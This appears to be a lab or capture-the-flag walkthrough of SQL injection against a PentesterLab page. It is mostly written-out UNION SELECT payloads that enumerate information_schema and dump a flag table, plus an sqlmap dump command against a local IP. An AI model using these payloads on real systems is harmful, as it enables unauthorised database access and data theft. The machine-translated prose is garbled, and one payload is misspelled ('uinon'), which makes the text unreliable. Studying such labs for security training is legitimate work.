Because the original text has been prompted to inject get (so start the injection directly, if you need to determine whether there is an injection point, you can use the method status of 'and and 1=1)
Two methods of manual injection of sql injection
① Simple injection of sql for injection
one , First try to use the'injection to detect the pop-up error page, that is, consider the injection method as character injection (because the integer injection is displayed as a normal page).
Second, the character injection is therefore considered to be closed single quotation marks
, that is, to construct ' -'-
here The role is to comment out the role of the following operator to achieve character injection.
Third, construct a statement for injection
’ order by 4 -- ‘//利用回旋的页面进行判断有几个字符,当by为4的时候回旋页面正常,5的时候报错,因此具有4个字符点
' uinon select 1,2,user(),database() -- '//进行爆当前的数据库和用户名
//进行读取数据库中的数据表
' union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='pentesterlab' limit 0,19 -- '//因为是个人习惯不知道到底有多少个所以直接读取多个数据表,注意只有在where那里为s
Read the fields in the data table
' union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_SCHEMA='pentesterlab' and TABLE_NAME='flag' limit 0,19 --'
Burst the flag to burst the data
’ union select 1,flag,3,4 from pentesterlab.flag -- '
The second method sublimates the structure and
uses group_concat() and where to construct and then inject the
data table.
' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database() -- '
Burst out the fields in the flag
' union select group_concat(column_name),2,3,4 from information_schema.columns where table_name= 'flag' -- '
The burst character is the same as the first method
②Using sqlmap for injection (because it is relatively simple to use sqlmap to inject, so here is not a picture, directly on the code segment)
//直接爆出flag
sqlmap -u http://192.168.18.131/pentest/test/sqli/sqltamp.php?gid=1 -D pentesterlab -T flag -C flag --dump